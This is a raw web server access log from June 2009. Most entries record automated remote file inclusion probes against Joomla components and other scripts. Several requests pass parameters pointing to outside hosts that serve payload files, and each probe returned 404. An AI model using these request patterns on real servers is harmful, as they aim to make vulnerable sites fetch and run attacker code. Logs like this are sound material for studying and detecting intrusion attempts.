66.79.164.109 - - [24/Jun/2009:05:29:13 -0400] "GET /logs/access_log.Q109051600/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.amembersignup.com/signup/smarty.do??? HTTP/1.1" 404 299 "-" "libwww-perl/5.812"
38.99.44.103 - - [24/Jun/2009:05:29:26 -0400] "GET /logs/error_log.Q108111900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
211.189.18.73 - - [24/Jun/2009:05:30:24 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:30:29 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:30:47 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:30:47 -0400] "GET /logs/access_log.Q109060100%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:30:52 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:05:30:52 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:05:30:55 -0400] "GET /logs/access_log.Q109050800%20%20/rfie404.php?DOCUMENT_ROOT=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.49 - - [24/Jun/2009:05:31:21 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01905F4003D3A900091006F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [24/Jun/2009:05:31:36 -0400] "GET /logs/access_log.Q109051300%20%20/rfie404.php?DOCUMENT_ROOT=http://www.petitbijouonline.com/includes/lib/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
